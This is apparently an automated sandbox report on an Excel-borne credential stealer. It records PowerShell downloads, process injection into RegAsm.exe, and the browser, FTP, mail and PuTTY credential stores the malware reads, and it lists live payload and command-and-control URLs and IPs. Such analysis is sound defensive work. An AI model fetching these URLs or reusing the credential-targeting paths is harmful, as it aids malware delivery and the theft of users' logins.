Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: PopPassword 17_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: SmtpPassword 17_2_0040D069
Yara detected Credential Stealer
Source: Yara match File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336301 Sample: 6Cprm97UTl Startdate: 05/01/2021 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->67 69 9 other signatures 2->69 10 EXCEL.EXE 83 29 2->10         started        13 ntrwe.exe 2->13         started        16 ntrwe.exe 2 2->16         started        process3 file4 85 Obfuscated command line found 10->85 87 Document exploit detected (process start blacklist hit) 10->87 18 cmd.exe 10->18         started        21 cmd.exe 10->21         started        23 cmd.exe 10->23         started        55 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 13->55 dropped 89 Writes to foreign memory regions 13->89 91 Allocates memory in foreign processes 13->91 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->93 95 Injects a PE file into a foreign processes 13->95 signatures5 process6 signatures7 71 Obfuscated command line found 18->71 25 powershell.exe 7 18->25         started        27 powershell.exe 16 9 21->27         started        32 RegAsm.exe 21->32         started        34 powershell.exe 7 23->34         started        process8 dnsIp9 36 12.exe 5 25->36         started        57 bighoreca.nl 83.172.144.37, 49167, 80 NEDZONE-ASNL Netherlands 27->57 59 cutt.ly 104.22.0.232, 443, 49165 CLOUDFLARENETUS United States 27->59 53 C:\Users\user\Documents\12.exe, PE32 27->53 dropped 97 Drops PE files to the document folder of the user 27->97 99 Powershell drops PE file 27->99 file10 signatures11 process12 file13 51 C:\Users\user\ntrwe.exe, PE32 36->51 dropped 73 Drops PE files to the user root directory 36->73 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->75 40 ntrwe.exe 2 36->40         started        43 cmd.exe 36->43         started        signatures14 process15 signatures16 77 Machine Learning detection for dropped file 40->77 79 Writes to foreign memory regions 40->79 81 Allocates memory in foreign processes 40->81 83 2 other signatures 40->83 45 RegAsm.exe 54 40->45         started        49 reg.exe 1 43->49         started        process17 dnsIp18 61 185.206.215.56, 49168, 49169, 49170 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 45->61 101 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->101 103 Tries to steal Mail credentials (via file registry) 45->103 105 Tries to steal Mail credentials (via file access) 45->105 107 2 other signatures 45->107 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
83.172.144.37
 unknown Netherlands
25459 NEDZONE-ASNL true
104.22.0.232
 unknown United States
13335 CLOUDFLARENETUS true
185.206.215.56
 unknown Ukraine
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL true

Contacted Domains

Name IP Active
cutt.ly 104.22.0.232 true
bighoreca.nl 83.172.144.37 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe true
  • Avira URL Cloud: safe
 unknown
http://185.206.215.56/morx/1/cgi.php true
  • Avira URL Cloud: safe
 unknown